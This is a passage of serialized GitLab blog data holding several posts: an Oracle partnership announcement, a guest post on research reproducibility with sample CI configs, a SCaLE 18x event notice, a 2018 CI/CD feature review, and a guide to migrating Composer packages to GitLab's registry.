Review","en-us/blog/gitlab-2018-year-in-review.yml","en-us/blog/gitlab-2018-year-in-review",{"_path":2219,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2220,"content":2226,"config":2234,"_id":2236,"_type":14,"title":2237,"_source":16,"_file":2238,"_stem":2239,"_extension":19},"/en-us/blog/gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development",{"title":2221,"description":2222,"ogTitle":2221,"ogDescription":2222,"noIndex":6,"ogImage":2223,"ogUrl":2224,"ogSiteName":673,"ogType":674,"canonicalUrls":2224,"schema":2225},"Oracle and GitLab partner for cloud-native app development","Learn the benefits of deploying the DevOps platform on Oracle Cloud 
Infrastructure.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668514/Blog/Hero%20Images/multi-cloud-future.jpg","https://about.gitlab.com/blog/gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab and Oracle partner for a cloud native approach to modern application development\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Creighton Swank\"},{\"@type\":\"Person\",\"name\":\"Vick Kelkar\"}],\n        \"datePublished\": \"2022-10-20\",\n      }",{"title":2227,"description":2222,"authors":2228,"heroImage":2223,"date":2231,"body":2232,"category":1119,"tags":2233},"GitLab and Oracle partner for a cloud native approach to modern application development",[2229,2230],"Creighton Swank","Vick Kelkar","2022-10-20","\nModern application development requires a cloud native platform that can operate in and across multiple cloud providers. GitLab has partnered with Oracle to enable customers to run GitLab’s DevOps platform on Oracle Cloud Infrastructure (OCI).\n\nWith OCI, organizations can accelerate migrations of existing enterprise workloads, deliver better reliability and performance for all applications, and offer the complete services customers need to build innovative cloud applications. With GitLab’s DevOps platform and OCI, businesses can create a resilient, high-performance DevOps environment. 
OCI also supports automatic operating system patching and zero trust architecture, which aligns with GitLab’s focus on [application security](/stages-devops-lifecycle/secure/).\n\n## The benefits of pairing GitLab and OCI\n\nPairing GitLab’s DevOps platform and OCI provides many benefits, including the following:\n\n- performance\n- platform breadth\n- security\n- value\n- hybrid and multi-cloud environments\n- GovCloud regions\n\n### Performance\n\nOCI provides a high-performance, resilient foundation for cloud services. Customers can quickly provision instances that feature the latest-generation processors via API, SDK, command line, Terraform, or the console. Workloads can scale up and/or out based on their requirements and compute-intensive workloads can leverage GPU shapes for hardware acceleration of AI/ML workloads. At the same time, GitLab runners can be configured to [leverage Nvidia GPUs](https://docs.gitlab.com/runner/configuration/gpus.html) for various executors to take advantage of GPUs and AI/ML workloads. \n\n### Platform breadth\n\nGitLab’s DevOps platform has the ability to integrate with Kubernetes service like OKE via GitLab Kubernetes agent. Leveraging GitLab’s Kubernetes agent will unlock [GitOps workflow](https://docs.gitlab.com/ee/user/clusters/agent/gitops.html) and [CI/CD workflow](https://docs.gitlab.com/ee/user/clusters/agent/ci_cd_workflow.html) for cloud native development. And the Oracle Cloud Infrastructure also offers a wide variety of platform services that allow customers to run workloads without having to manage infrastructure. Customers can run workloads on compute instances, in containers with Oracle Kubernetes Engine (OKE), or even as serverless functions. Services like object storage and events can be leveraged to build applications without managing infrastructure at all. For a complete list of these services, please click [here](https://docs.oracle.com/en-us/iaas/Content/services.htm). 
\n\n### Security\n\nThe second generation of OCI has been redesigned from the ground up to be a secure cloud. Oracle designed OCI architecture for security of the platform through isolated network virtualization, highly secure firmware installation, a controlled physical network, and network segmentation. GitLab’s DevOps platform is not only an OIDC provider but the platform integrates with other identity providers to support single sign-on capabilities. The platform’s [permission model](https://docs.gitlab.com/ee/user/permissions.html#instance-wide-user-permissions) follows similar approaches used by OCI around separation of concerns and role-based access to resources. \n\n### Value\n\nMission-critical and revenue-generating applications demand more than just availability from their cloud infrastructure. Mission-critical workloads also require consistent performance and the ability to manage, monitor, and modify resources running in the cloud at any time. OCI offers end-to-end SLAs covering performance, availability, and manageability of services. \n\nGitLab’s DevOps platform uses the same code base for the SaaS offering as well as self-managed instances. Having the same code base allows customers to adopt the mission-critical DevOps platform in heavily regulated industries such as financial services and healthcare.\n\n### Support for hybrid and multi-cloud environments\n\nEven though many enterprises are moving workloads to the cloud, the reality is this is a multi-cloud world, and many enterprises still maintain infrastructure locally. Oracle has entered into strategic partnerships designed to make it easier for customers to operate in a hybrid and multi-cloud environment. \n\nOracle has partnered with VMware to create the Oracle Cloud VMware solution that allows customers the ability to use their existing tools and processes to manage a VMware environment in OCI. 
This allows enterprises to accelerate cloud adoption without having to re-architect their applications.\n\nGitLab’s DevOps platform can be deployed on vSphere infrastructure using the GitLab [omnibus install](https://docs.gitlab.com/omnibus/) method. The platform can be installed on-premises or in the cloud. GitLab can be deployed on VMs and the GitLab runners can extend CI capabilities into other cloud environments and [cloud-native hybrid](https://docs.gitlab.com/ee/administration/reference_architectures/#cloud-native-hybrid) deployments.\n\n### GovCloud regions\n\nOCI can provide government customers with the stringent security standards necessary to protect the federal government's data. Oracle has obtained a P-ATO from the Joint Authorization Board for FedRAMP High in its U.S. Government Cloud regions. Varying levels of DISA authorizations are also available but vary by services. Find an up-to-date list [here](https://www.oracle.com/industries/government/federal/fedramp/). Meanwhile, GitLab is pursuing a FedRAMP moderate certification and working on activities related to FedRAMP-ready designation. \n\n## Get started with the GitLab DevOps platform and OCI\nOrganizations looking to run GitLab’s DevOps platform on OCI can leverage the supported [Oracle Linux](/install/) package for the platform install. Alternatively, they can leverage the helm chart or GitLab Operator to deploy to Oracle Kubernetes Engine (OKE), which will provide a [cloud-native hybrid approach](https://docs.gitlab.com/ee/administration/reference_architectures/25k_users.html#cloud-native-hybrid-reference-architecture-with-helm-charts-alternative) of the GitLab DevOps platform on OCI.\n\nGitLab’s DevOps platform, delivered as a single application, can run on multiple clouds and has the capability of supporting various official [Linux packages](/install/). 
Besides Linux packages, GitLab’s platform also supports deployments on Kubernetes using [helm charts](https://docs.gitlab.com/charts/) and Kubernetes [GitLab Operator](https://docs.gitlab.com/operator/). \n\nIf you would like to learn more about the GitLab DevOps platform and OCI, please access the [LiveLabs](https://apexapps.oracle.com/pls/apex/dbpm/r/livelabs/home).\n\n_[Kelkar](https://gitlab.com/vkelkar) is GitLab's Director of Alliances. Swank is Distinguished Cloud Architect and Cloud CTO at Oracle._\n",[685,9,845,282],{"slug":2235,"featured":6,"template":689},"gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development","content:en-us:blog:gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development.yml","Gitlab And Oracle Partner For A Cloud Native Approach To Modern Application Development","en-us/blog/gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development.yml","en-us/blog/gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development",{"_path":2241,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2242,"content":2248,"config":2254,"_id":2256,"_type":14,"title":2257,"_source":16,"_file":2258,"_stem":2259,"_extension":19},"/en-us/blog/gitlab-and-reproducibility",{"title":2243,"description":2244,"ogTitle":2243,"ogDescription":2244,"noIndex":6,"ogImage":2245,"ogUrl":2246,"ogSiteName":673,"ogType":674,"canonicalUrls":2246,"schema":2247},"How GitLab can help in research reproducibility","NYU reproducibility librarian Vicky Steeves shares why GitLab is her choice for ongoing collaborative research, and how it can help overcome challenges with sharing code in academia.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749672928/Blog/Hero%20Images/gitlab-and-reproducibility.jpg","https://about.gitlab.com/blog/gitlab-and-reproducibility","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": 
\"Article\",\n        \"headline\": \"How GitLab can help in research reproducibility\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Vicky Steeves\"}],\n        \"datePublished\": \"2017-08-25\",\n      }",{"title":2243,"description":2244,"authors":2249,"heroImage":2245,"date":2251,"body":2252,"category":10,"tags":2253},[2250],"Vicky Steeves","2017-08-25","\nGitLab is a great platform for active, ongoing, collaborative research. It enables folks to work together easily and share that work in the open. This is especially poignant given the problems in sharing code in academia, across time and people.\n\n\u003C!-- more -->\n\n![phd-code-comic](https://phdcomics.com/comics/archive/phd031214s.gif)\n\nIt's no surprise that GitLab, a platform for collaborative coding and Git repository hosting, has features for reproducibility that researchers can leverage for their own and their communities’ benefit.\n\n### What exactly is reproducibility?\n\nReproducibility is a core component in a variety of work, from software engineering to research. For software engineers, the ability to reproduce errors or functionality is key to development. For researchers, reproducibility is about independent verification of results/methods, to build on top of previous work, and to increase the impact, visibility, and quality of research. Y’know. That Sir Isaac Newton quote in every reproducibility presentation ever: \"If I have seen further, it is by standing on the shoulders of giants.\"\n\nLike all things, reproducibility exists on a spectrum. 
I like Stodden et al’s definitions from the [2013 ICERM report](http://stodden.net/icerm_report.pdf), so I’ll use those:\n\n| ICERM Report Definitions | Potential Real-World Examples |\n|:-----------------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------------------------------------------------|\n| Reviewable Research: Sufficient detail for peer review and assessment                            | The code and data are openly available |\n| Replicable Research: Tools are available to duplicate the author’s results using their data    | The tools (software) used in the analysis are freely available for others to confirm results                                   |\n| Confirmable Research: Main conclusions can be attained independently without author’s software | Others can reach the conclusion using similar tools, not necessarily the same as the author, or on a different operating system |\n| Auditable Research: Process and tools archived such that it can be defended later if necessary   | The tools, environment, data, and code are put into a preservation-ready format                                                |\n| Open/Reproducible Research: Auditable research made openly available                           | Everything above is made available in a repository for others to examine and use                                               |\n\nThe last bullet there is the goal – open and reproducible research. Releasing code and data are key to open research, but not necessarily enough for reproducibility. This is where the concept of computational reproducibility becomes important, where whole environments are captured. 
You could also look at it this way:\n\n![reproducibility-pyramid](https://osf.io/8rx9y/download)\n\n### How can GitLab help?\n\nThere are a few solutions out there, including containers (such as Docker or Singularity) for active research, and [o2r](http://o2r.info/) and [ReproZip](https://reprozip.org) for capturing and reproducing completed research. For this post, I’m going to focus on active research and containers.\n\nI like GitLab for research reproducibility because it makes working together simple, and seamless. There’s no hacking together 100 different third-party services. GitLab has hosting, LFS, and integrated Continuous Integration for free, for both public and private repositories! Everything is integrated in a single GitLab repository which, if made publicly available, can enable secondary users to reproduce results in a more streamlined fashion. You can also keep these private to a group – you control the visibility of everything in one repository in one place, as opposed to updating permissions across multiple services.\n\nThere are a few key features that set GitLab apart when it comes to containers and reproducibility. The first is that GitLab doesn’t use a third-party service for continuous integration. It’s shipped with CI runners which can use Docker images from GitLab’s registry. Basically, you can use the Docker Container Registry, a secure, private Docker registry, to choose a container that GitLab CI uses to run each job in a separate and isolated container.\n\n![gitlab-ci-repro](https://about.gitlab.com/images/ci/arch-1.jpg)\n\nIf you don’t feel like using the GitLab registry, you can also use images from DockerHub or a custom Docker container you’re already using locally. These can be integrated with GitLab CI, and if made public, any secondary users can use it as well!\n\n### Let's look at an example\n\nThis process is set up in a single file, a `.gitlab-ci.yml`. 
Another feature that makes my life easier – GitLab can syntax-check the CI config files! The `.gitlab-ci.yml` file describes the pipelines and stages, each of which has a different function and can have its own tags, produce its own artifacts, and reuse artifacts from other stages. These stages can also run in parallel if needed. Here’s an example of what a basic config file looks like with R:\n\n```\nimage: jangorecki/r-base-dev\ntest:\n  script:\n    - R CMD build . --no-build-vignettes --no-manual\n    - PKG_FILE_NAME=$(ls -1t *.tar.gz | head -n 1)\n    - R CMD check \"${PKG_FILE_NAME}\" --no-build-vignettes --no-manual --as-cran\n```\n\nAnd here’s an example of building a website using the GitLab and the static site generator, Nikola:\n\n```\nimage: registry.gitlab.com/paddy-hack/nikola:7.8.7\ntest:\n  script:\n  - nikola build\n  except:\n  - master\n\npages:\n  script:\n    - nikola build\n  artifacts:\n    paths:\n    - public\n  only:\n  - master\n```\n\nIt’s also worth noting that you can use different containers per step in your workflow, if you outline it in your .gitlab-ci.yml. If your data collection script runs in one environment but your analysis script needs another, that’s perfectly fine using GitLab, and others have the information to reproduce it easily! Another feature that puts GitLab apart is that a build of one project can trigger a build of another – AKA, multi-project pipelines. 
For those of you working with big data, you can automatically spin up and down VMs to make sure your builds get processed immediately with GitLab’s CI as well.\n\nHere are some other great resources and examples of using GitLab to make research more reproducible:\n\n+ [Gitlab-CI for R packages](https://gitlab.com/jangorecki/r.gitlab.ci)\n+ [Blog Post explaining GitLab + reproducibility - Jon Zelner](http://www.jonzelner.net/statistics/make/docker/reproducibility/2016/05/31/reproducibility-pt-1/)\n+ [GitLab repo accompanying blog post - Jon Zelner](https://gitlab.com/jzelner/reproducible-stan)\n+ [Continuous Integration with Gitlab - Tony Wildish](https://www.nersc.gov/assets/Uploads/2017-02-06-Gitlab-CI.pdf)\n\nBeyond reproducibility, there are a lot of features that make GitLab an ideal place for me to work and organize my research. I’d urge folks to look at the [feature list](/pricing/feature-comparison/) and see how they can get started!\n\n## About the Guest Author\n\nVicky Steeves is the Librarian for Research Data Management and Reproducibility at New York University, a dual appointment between the Division of Libraries and Center for Data Science. In this role, she works supporting researchers in creating well-managed, high quality, and reproducible research through facilitating use of tools such as ReproZip. 
Her research centers on integrating reproducible practices into the research workflow, advocating openness in all facets of scholarship, and building/contributing to open infrastructure.\n\n“[research](https://www.flickr.com/photos/alovesdc/3464555556/)” by [a loves dc](https://www.flickr.com/photos/alovesdc/) is licensed under [CC BY 2.0](https://creativecommons.org/licenses/by/2.0/legalcode)\n{: .note}\n",[9,779,910],{"slug":2255,"featured":6,"template":689},"gitlab-and-reproducibility","content:en-us:blog:gitlab-and-reproducibility.yml","Gitlab And Reproducibility","en-us/blog/gitlab-and-reproducibility.yml","en-us/blog/gitlab-and-reproducibility",{"_path":2261,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2262,"content":2267,"config":2272,"_id":2274,"_type":14,"title":2275,"_source":16,"_file":2276,"_stem":2277,"_extension":19},"/en-us/blog/gitlab-at-scale",{"title":2263,"description":2264,"ogTitle":2263,"ogDescription":2264,"noIndex":6,"ogImage":1348,"ogUrl":2265,"ogSiteName":673,"ogType":674,"canonicalUrls":2265,"schema":2266},"Join the GitLab Community Day at SCaLE 18x!","If you're attending SCaLE 18x, here's how you can find the GitLab community at the event.","https://about.gitlab.com/blog/gitlab-at-scale","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join the GitLab Community Day at SCaLE 18x!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-02-17\",\n      }",{"title":2263,"description":2264,"authors":2268,"heroImage":1348,"date":2269,"body":2270,"category":951,"tags":2271},[704],"2020-02-17","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nWe just returned from [FOSDEM](https://fosdem.org/2020/), where we had a great time meeting with and talking to GitLab community members. 
We will be on the road again to Southern California in a few weeks at [SCaLE 18x](https://www.socallinuxexpo.org/scale/18x), and hope to meet with wider GitLab community members at the event! If you are not familiar with SCaLE, it is the largest volunteer-organized open-source and free software event in North America. This year will be the 18th edition of the conference, and the SCaLE team provided us with a 40% discount code for GitLab community. When you [register](https://register.socallinuxexpo.org/reg6/), you can use the code `GIT` for the discount!\n\n### GitLab Community Day\n\nThis year, we are organizing a [GitLab Community Day](https://www.socallinuxexpo.org/scale/18x/gitlab-community-day), where we will have a discussion on resources for the wider community, a hands-on workshop on how you can contribute to GitLab, and a tutorial on how to use GitLab.\n\nSeveral team members from the [GitLab Developer Relations team](https://about.gitlab.com/company/team/?department=community-relations) will be at SCaLE 18x this time around. If you're interested in learning more about GitLab's programs for supporting code contributors, educational institutions, evangelists, open source communities, and more, we'd love to meet you in person.\n\n- **WHEN**: Friday, March 6th, from 1:30 p.m. to 5:30 p.m. \n- **WHERE**: **Ballroom F** at the Pasadena Convention Center\n\nYou can find more information on topics and speakers on the [Gitlab Community Day issue](https://gitlab.com/gitlab-com/marketing/community-relations/evangelist-program/general/issues/900). You are welcome to add feedback or suggestions directly on the issue.  \n\n### DevOpsDay LA \n\nGitLab will again be a sponsor for [DevOpsDay LA](https://www.socallinuxexpo.org/scale/18x/devopsday-la) at SCaLE, and we will have a **GitLab booth** in the DevOpsDay LA exhibit area on March 6th. If you want to come talk to GitLab team members about anything DevOps, please swing by our booth and check out some GitLab swag. 
Speaking of swag, there will also be a raffle at 3:35pm where the winner will get a Nintendo Switch! So, please be sure to enter the raffle while you visit the GitLab booth. \n\n- **WHEN**: Friday, March 6th, all day \n- **WHERE**: **Ballroom DE** at the Pasadena Convention Center\n\n\n### Talks given by GitLab team members at SCaLE 18x\n\nA couple of GitLab team members will be speaking at the conference:\n\n- On Friday March 6th, [Francis Potter](https://gitlab.com/francispotter) will discuss [The Future of DevOps and the Importance of Right-to-Left Thinking](https://www.socallinuxexpo.org/scale/18x/presentations/future-devops-and-importance-right-left-thinking) in the DevOps track.\n- On Saturday March 7th, I ([Ray Paik](https://gitlab.com/rpaik)) will be talking about [Building a thriving community in (for-profit) open source projects](https://www.socallinuxexpo.org/scale/18x/presentations/building-thriving-community-profit-open-source-projects) in the Mentoring track. \n\n\n\nPlease come say hi 👋 at SCaLE, and we look forward to seeing many of you in sunny Southern California!\n",[267,779,9],{"slug":2273,"featured":6,"template":689},"gitlab-at-scale","content:en-us:blog:gitlab-at-scale.yml","Gitlab At Scale","en-us/blog/gitlab-at-scale.yml","en-us/blog/gitlab-at-scale",{"_path":2279,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2280,"content":2286,"config":2292,"_id":2294,"_type":14,"title":2295,"_source":16,"_file":2296,"_stem":2297,"_extension":19},"/en-us/blog/gitlab-ci-cd-features-improvements",{"title":2281,"description":2282,"ogTitle":2281,"ogDescription":2282,"noIndex":6,"ogImage":2283,"ogUrl":2284,"ogSiteName":673,"ogType":674,"canonicalUrls":2284,"schema":2285},"GitLab CI/CD's 2018 highlights","We move quickly, always with an eye to the future, but let's take a moment to look back on how GitLab CI/CD has evolved in the past six 
months.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663779/Blog/Hero%20Images/cicd-2018_blogimage.jpg","https://about.gitlab.com/blog/gitlab-ci-cd-features-improvements","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab CI/CD's 2018 highlights\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jason Yavorska\"}],\n        \"datePublished\": \"2019-01-21\",\n      }",{"title":2281,"description":2282,"authors":2287,"heroImage":2283,"date":2289,"body":2290,"category":299,"tags":2291},[2288],"Jason Yavorska","2019-01-21","\nHello everyone, and happy New Year! For those who don't know me, my name is [Jason Yavorska](/company/team/#jyavorska) and I've been the product manager of GitLab CI/CD since around the middle of last year. 2018 was a big year for CI/CD improvements in GitLab, and I'm so proud of our team and what we've been able to deliver in partnership with you, our users. Even just looking back on the last six months of improvements, we've delivered a ton of changes that move our vision for CI/CD forward, address important asks from our users, and build the foundation for an amazing 2019.\n\nBelow are a few of the highlights from my time here so far; be sure to let me know in the comments if I missed something that meant a lot to you.\n\n## Access control for GitLab Pages\n\nOne of the most amazing things about working for an open core company like GitLab is that our community of users can play an outsized role in how our product grows and develops, thanks to their always impressive contributions. 
Last year we introduced [Access control for Pages (11.5)](https://gitlab.com/gitlab-org/gitlab-ce/issues/33422), a feature with 304 👍 that was actually part of our 2019 vision, and was built thanks to a significant community contribution from MVP [Tuomo Ala-Vannesluoma](https://gitlab.com/tuomoa).\n\nThis was not just a great feature, but also highlights how GitLab and community contributors can work together to do amazing things. It came out shortly after I joined as a new product manager here, and it really opened my eyes to the possibilities inherent in working together transparently and openly with our user community. Now I don't think I could ever go back to any other way of working.\n\n## Feature flags\n\nI'm always looking for ways to expand our horizons and bring more great capabilities into the CI/CD space, and the team achieved that last year with [Allow users to create and manage feature flags for their applications (11.4)](https://gitlab.com/gitlab-org/gitlab-ee/issues/6220). A major piece of our 2018 vision, feature flags are so important to continuous delivery workflows since they allow you to safely isolate delivering your code to production, from the moment users engage with it, giving you more control and better options when it comes to how and when you deliver software.\n\n![CI/CD feature flags](https://about.gitlab.com/images/blogimages/cicd-feature_flags.png){: .shadow.medium.center}\n\n## Pipelines for merge requests\n\nSometimes, what you do in one year may be valuable on its own, but it also helps establish a foundation for more in the future. A common request from the community last year had been to make pipelines more aware of merge requests, so that at runtime, information such as the target branch, merge request name and ID, and other information was available to the pipeline. 
In 2018 we introduced [`only/except: merge_requests` for merge request pipelines (11.6)](https://gitlab.com/gitlab-org/gitlab-ce/issues/15310), which created this linkage. One great way to take advantage of this feature already is to use it to only create [Review Apps](https://docs.gitlab.com/ee/ci/review_apps/) on merge requests, helping to save money on environments versus creating them for every pipeline.\n\nPerhaps even more exciting than this feature on its own, is that it will continue to evolve and grow into the ability to [Run a pipeline on what the merged result will be](https://gitlab.com/gitlab-org/gitlab-ee/issues/7380). I can already say with confidence that this will be a game changer for teams that want to prioritize keeping their `master` branch green. As far as predicting the future outside of GitLab, I'm still accepting merge requests for that 😉\n\n![pipelines for merge requests](https://about.gitlab.com/images/blogimages/cicd-mr_pipelines.png){: .shadow.medium.center}\n\n## Usability improvements for the merge request widget\n\nSpeaking of merge requests, in general the team has made a lot of improvements to how the merge request widget interacts with CI/CD. We added [JUnit XML Test Summary (11.2)](https://gitlab.com/gitlab-org/gitlab-ce/issues/45318), part of our 2018 vision to make testing a more interactive part of the CI pipeline. We also now [Show enhanced information on running deploys (11.5)](https://gitlab.com/gitlab-org/gitlab-ce/issues/25140), and [Link directly to changed pages in Review App (11.5)](https://gitlab.com/gitlab-org/gitlab-ce/issues/33418), which uses [Route Maps](https://docs.gitlab.com/ee/ci/environments/index.html#go-directly-from-source-files-to-public-pages-on-the-environment) to send you directly to the updated content. 
Both of these changes were welcome improvements that made it much easier to see what was going on, all in one place.\n\n![CI/CD review app link](https://about.gitlab.com/images/blogimages/cicd-reviewapp_link.png){: .shadow.medium.center}\n\n## #movingtogitlab\n\n[#movingtogitlab](https://twitter.com/hashtag/movingtogitlab?src=hash) was an exciting movement in 2018, and I wanted to ensure a great experience for everyone checking us out, even if they were just trying out GitLab CI or other features, and still using GitHub for repositories. One of the challenges that people ran into early on was the way status checks were named by GitLab CI, which didn't play nicely with the way GitHub expected them to work. The team was able to introduce [Name status checks consistently to support GitHub-integrated CI workflow (11.5)](https://gitlab.com/gitlab-org/gitlab-ce/issues/53902) as a change to unblock this, ensuring a valuable experience for everyone, even if you weren't ready to go \"all in\" on GitLab yet.\n\n## Stewardship\n\nHere at GitLab, we take [stewardship of open source](/company/stewardship/) seriously. I was very happy to move the `include:` keyword from paid to free, because I know how important it is for CI/CD users to support proper reuse instead of copy-pasted code. 
[Move \"include external files in .gitlab-ci.yml\" from Starter to Core (11.4)](https://gitlab.com/gitlab-org/gitlab-ce/issues/42861) (with a grand total of 267 👍 on the issue) achieved this, and opened up new doors, not just for avoiding duplication, but also for more secure ways of implementing common workflows by moving compliance, security, and governance job implementation to a centrally controlled location.\n\n## Honorable mentions\n\nThere wasn't enough time to cover everything in this post without making it a mile long, but there are a few other honorable mentions I want to call out:\n\n- [11.2: Manually stopping environments](https://gitlab.com/gitlab-org/gitlab-ce/issues/25388) (with 245 👍 from our users) added the ability to manually stop your environments, such as review apps, instead of only through pipeline automation.\n- [11.3: Improve handling of includes in `.gitlab-ci.yml` to better enable script reuse/templates](https://gitlab.com/gitlab-org/gitlab-ce/issues/51521) introduced a new way to `extend` your job definitions using templates, including from across different files.\n- [11.4: Run jobs only/except when there are changes for a given path or file](https://gitlab.com/gitlab-org/gitlab-ce/issues/19232) (with a whopping 424 👍) gave you the ability to control whether a job runs or not, based on which files were changed.\n- [11.4: Add support for interactive web terminal to Docker executor](https://gitlab.com/gitlab-org/gitlab-runner/issues/3467) let you connect an interactive web terminal to a build/deploy environment and troubleshoot on the live runner host.\n- [11.4: Add timed deployments to AutoDevOps incremental rollouts](https://gitlab.com/gitlab-org/gitlab-ee/issues/7545) enabled new deployment strategies where the rollout was done over time in phases.\n- [11.5: `parallel` job keyword to speed up pipelines](https://gitlab.com/gitlab-org/gitlab-ce/issues/21480) added an easy way to run parallel instances of a job without creating duplicate jobs in your 
`gitlab-ci.yml`.\n- [11.6: Allow pipelines to be deleted by project owners](https://gitlab.com/gitlab-org/gitlab-ce/issues/41875) (265 👍) gave control over removing old and invalid pipelines, as well as those which may have accidentally included sensitive information in the outputs.\n\n## What's next?\n\nOf course, the mission to improve GitLab CI/CD doesn't stop here. We're bringing [Brendan O'Leary](/company/team/#olearycrew) on board as the full-time product manager for CI (what we call the [Verify stage](/stages-devops-lifecycle/verify/)), freeing me up to focus entirely on CD (what we call [Release](/stages-devops-lifecycle/release/)). We're also significantly growing headcount for the engineering teams supporting us. Having full-time product managers and larger teams dedicated to each of these stages is going to allow us to deliver even more amazing things, even faster.\n\nI've touched on a couple points above, but tried to avoid making this a preview of what's coming for CI/CD in 2019. If you're interested in where Brendan and I are headed, you can visit our direction pages for [Verify (CI)](/direction/verify/) and [Release (CD)](/direction/release/), and feel free to reach out to us directly if you'd like to have a conversation – we'd love to chat about your ideas. Being a transparent, open core company, we also welcome participation in all of our public issues (which you'll find linked to from the above direction pages). For me, the best part of this job is interacting with you, the users of GitLab, so thank you for that opportunity. Here's to another great year of working together to make the job of delivering software fun and rewarding!\n\n## Just one more thing...\n\nI'd be remiss if I didn't mention how great GitLab is as a place to work. If you're interested in joining our all-remote team, we're constantly growing and looking for great PMs and others to join us. Check out [our jobs page](/jobs/) to learn more. 
I'd encourage you to apply even if you don't see an exact match – GitLab is great at finding the right fit for the right personality, even if that's not exactly listed on our hiring website. If you're really unsure, feel free to reach out to me directly ([@j4yav](https://twitter.com/j4yav)) and I'll help you get in touch with the right person.\n",[1036,267,1099,803,9],{"slug":2293,"featured":6,"template":689},"gitlab-ci-cd-features-improvements","content:en-us:blog:gitlab-ci-cd-features-improvements.yml","Gitlab Ci Cd Features Improvements","en-us/blog/gitlab-ci-cd-features-improvements.yml","en-us/blog/gitlab-ci-cd-features-improvements",{"_path":2299,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2300,"content":2306,"config":2312,"_id":2314,"_type":14,"title":2315,"_source":16,"_file":2316,"_stem":2317,"_extension":19},"/en-us/blog/gitlab-composer-packages-migration-path",{"title":2301,"description":2302,"ogTitle":2301,"ogDescription":2302,"noIndex":6,"ogImage":2303,"ogUrl":2304,"ogSiteName":673,"ogType":674,"canonicalUrls":2304,"schema":2305},"Migrate composer packages to GitLab","GitLab Packages now ships with a composer registry","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681586/Blog/Hero%20Images/gitlab-composer-package-migration.jpg","https://about.gitlab.com/blog/gitlab-composer-packages-migration-path","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Migrate composer packages to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jochen Roth\"}],\n        \"datePublished\": \"2020-09-22\",\n      }",{"title":2301,"description":2302,"authors":2307,"heroImage":2303,"date":2309,"body":2310,"category":951,"tags":2311},[2308],"Jochen Roth","2020-09-22","\n\n{::options parse_block_html=\"true\" /}\n\n\n\n## Manage Composer Packages in Gitlab\n\nWith Gitlab 13.3, a repository for composer packages was introduced. 
This allows you to store and manage your private and public composer packages in your Gitlab instance.\n\n### Create Packages\n\nCreating packages is only a matter of adding the composer template to your `.gitlab-ci.yml`. Gitlab will automatically create a package when a git tag was created or a commit was pushed to a branch.\n\n[\u003Cimg src=\"/images/blogimages/select-template.png\" width=\"500\" height=\"auto\">](/images/blogimages/select-template.png)\n\n### Migrate your Packages to Gitlab\n\nYou might wonder how to create packages for your existing tags of each repository.\n\nYou have 2 options:\n\n1. Use curl to create packages manually e.g. ```curl --data tag=1.0.0 'https://__token__:\u003Cpersonal-access-token>@gitlab.com/api/v4/projects/\u003Cproject_id>/packages/composer'```\n2. Use [this package](https://gitlab.com/ochorocho/gitlab-create-package-versions), which will create all packages and their versions for you using the Gitlab API.\n\n## Conclusion\n\nSo far it is working pretty well. Publish and install packages works flawlessly. Managing permissions for a package is a breeze.\n\nCurrently there is only a group endpoint. I could imagine others may require an instance endpoint to be able to access all packages of a Gitlab instance using a single endpoint/repository.\nFor now you have to add multiple endpoints/repositories to your composer.json for each group.\n\nIn my company, one group contains all shared projects and we were able to circumvent adding multiple endpoints/repositories.\n\nThere is always room for improvement. 
For example, the GUI should show more [details about the size of packages and how it was published (manually or via CI)](https://gitlab.com/gitlab-org/gitlab/-/issues/254385) and [semantic versioning is not fully supported](https://gitlab.com/gitlab-org/gitlab/-/issues/240887).\nIf you are interested in GitLab or Composer, both issues are great ways to contribute, so that we can continue to improve this product together.\n\n## Resources\n\n* [GitLab Packages Docs](https://docs.gitlab.com/ee/user/packages/composer_repository/)\n* [Composer Docs](https://getcomposer.org/doc/)\n* [Migrate to Gitlab Packages](https://gitlab.com/ochorocho/gitlab-create-package-versions)\n",[9,686,231],{"slug":2313,"featured":6,"template":689},"gitlab-composer-packages-migration-path","content:en-us:blog:gitlab-composer-packages-migration-path.yml","Gitlab Composer Packages Migration Path","en-us/blog/gitlab-composer-packages-migration-path.yml","en-us/blog/gitlab-composer-packages-migration-path",{"_path":2319,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2320,"content":2326,"config":2331,"_id":2333,"_type":14,"title":2334,"_source":16,"_file":2335,"_stem":2336,"_extension":19},"/en-us/blog/gitlab-fan-profile",{"title":2321,"description":2322,"ogTitle":2321,"ogDescription":2322,"noIndex":6,"ogImage":2323,"ogUrl":2324,"ogSiteName":673,"ogType":674,"canonicalUrls":2324,"schema":2325},"Today is GitLab Fan Day","Join us in celebrating our most mysterious evangelist, GitLab 